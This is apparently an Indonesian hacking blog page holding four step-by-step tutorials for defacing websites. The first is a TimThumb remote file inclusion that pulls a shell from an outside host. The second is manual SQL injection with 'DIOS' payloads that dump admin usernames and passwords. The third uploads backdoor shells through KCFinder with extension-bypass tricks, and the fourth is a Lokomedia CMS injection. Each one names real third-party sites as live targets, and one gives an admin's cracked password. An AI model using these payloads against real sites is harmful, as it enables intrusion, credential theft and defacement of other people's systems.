Halaman

    Social Items

Assalamualaikum W.r W.b
wadap yooo bertemu lagi dengan saya
kali ini saya akan memberikan tutorial
mendeface dengan metode timthumb exploit 1.x RCE

BAHAN
1.Internet lah boy yakali kaga pake internet :p
2.Dork : inurl:/timthumb.php site:vn
              atau bisa kalian lihat dork lain nya disini Dork Timthumb
3.Exploit :  ?src=http://flickr.com.tukangpompajakarta.com/shell.php

yups langsung aja ya oke.... :p

- disini saya mempunyai live target : http://eurovie.vn/timthumb.php
*oh ya ciri web yg vuln itu seperti ini,versi yg vuln itu dibawah 1.32 diatasnya ga bisa :p
- jika sudah menemukan yg seperti itu kita langsung saja kita masuka exploit nya di belakang timthumb.php
*seperti ini :
 http://eurovie.vn/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
- yaps akan keluar seperti ini.
- jika sudah seperti itu tinggal kita akses si shell nya.
    *cara meng akses shell nya ikuti saja perintah disitu

Mungkin cukup sekian tutorial kali ini
next bakal ada tutorial tutorial lainnya
Oke.... see you on the next tutorial :p


Deface metode Timthumb exploit 1.x RCE

Assalamualaikum w.r w.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe :p

BAHAN
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
    *disini saya ada live target :
      http://rahmadewifurniture.com/media.php?module=detailproduk&id=460

yups langsung saja

- sekarang kita tambahkan '
jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'  
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- lalu kita disini melakukan perintah +order+by+1--+
- misal seperti ini :
- lakukan order by hingga menemukan error lagi seperti ini saya menemuka error di angka 16.
- berarti kita hanya ambil sampai 15 saja karena error nya di 16.
- selanjutnya kita melakukan perintah +union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
 [ /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- selanjutnya kita tinggal ambil user / password admin.
- dengan cara memasukan dios berikut
  [ (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
   http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
 *sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
- tinggal kalian cari saja halaman admin nya biasanya di
* -/admin
   -/administrator
   -/login.php
   -/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)

Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
and peaceee :p

Deface metode SQL Injection manual with Dios


Assalamualaikum W.r W.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial deface dengan metode KCFinder

Oke langsung saja....

BAHAN

1.Dork:inurl:/kcfinder/browse.php
             inurl:/assets/kcfinder/browse.php
             inurl:/panel/kcfinder/ site:bebas
*kembangin lagi biar dapet yg fresh :p
2.Exploit:/browse.php
3.Shell:biasanya jika ingin upload shell di kcfinder kita harus membypass extensi shell nya
            *extensi yang biasa di gunakan : .php5 .php2 .php.fla .php3 .php.pjpeg

- langsung saja kita dorking ke mbah google :p
- disini saya memiliki live target : http://www.somosnoticias.com.ve/assets/lib/kcfinder/
- lalu kita masukan exploit nya : http://www.somosnoticias.com.ve/assets/lib/kcfinder/browse.php
- ya sekarang kita tinggal upload shell backdoor atau script deface
- klik upload lalu pilih file shell backdoor atau script deface kalian dan akan seperti ini
 - lalu jika sudah meng upload shell atau script kita cek hasil nya
 - untuk mengakses file yg kalian upload meng akses nya seperti ini
    *site.com/[path]/kcfinder/upload/files/filekalian
 - bisa dibilang seperti ini :
    http://www.somosnoticias.com.ve/assets/lib/kcfinder/upload/files/galau.html
 - yaps sekian tutorial dari saya...

See you on the next tutorial hehe....

Deface metode KCFinder


 

Assalamualaikum W.r W.b
Bertemu lagi dengan saya
Kali ini saya aka memberikan tutotial deface dengan cara SQL injection on Lokomedia CMS

Oke, simak baik baik ya...

BAHAN
1.Dork:inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html
*nomer nya bisa di ubah agar bisa dapet yg fresh hehe

2.Exploit:
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

yaps langsung saja kita dorking memakai dork yg di atas tadi
- disini saya sudah mempunyai live target > http://www.smaitnurhidayah.sch.id/statis-1-profil.html
- yaps lalu kita masukan exploit nya di bagian setelah angka jadi seperti ini
  http://www.smaitnurhidayah.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
- setelah itu kita ambil user dan password, kalian bisa menggunakan CTRL + U untuk mengambil user dan password nya contoh seperti ini
- yaps sudah terlihat user dan password nya tapi password nya masih berbentuk MD5 maka kita harus mendecrypt password tersebut menggunakan Hash Killer
- kalian bisa mendecrypt password tersebut disini Hash Killer
- mari kita decrypt password tersebut, yap dan hasilnya seperti ini
- dan ternyata password nya itu adalah : 12oktober2008
- setelah itu kalian tinggal login ke halaman admin
- untuk login cms lokomedia biasanya di
   -site.com/admin
   -site.com/adminweb
   -site.com /redaktur
   -site.com/administrator
- yaps jika sudah menemukan admin login nya kalian bisa upload shell atau edit berita entahlah sesuka kalian
- ya mungkin cukup sekian.... next saya akan memberikan tutorial mengupload shell di cms lokomedia
  
ok see you on the next tutorial babay :).....



Deface dengan metode SQL Lokomedia

Subscribe Our Newsletter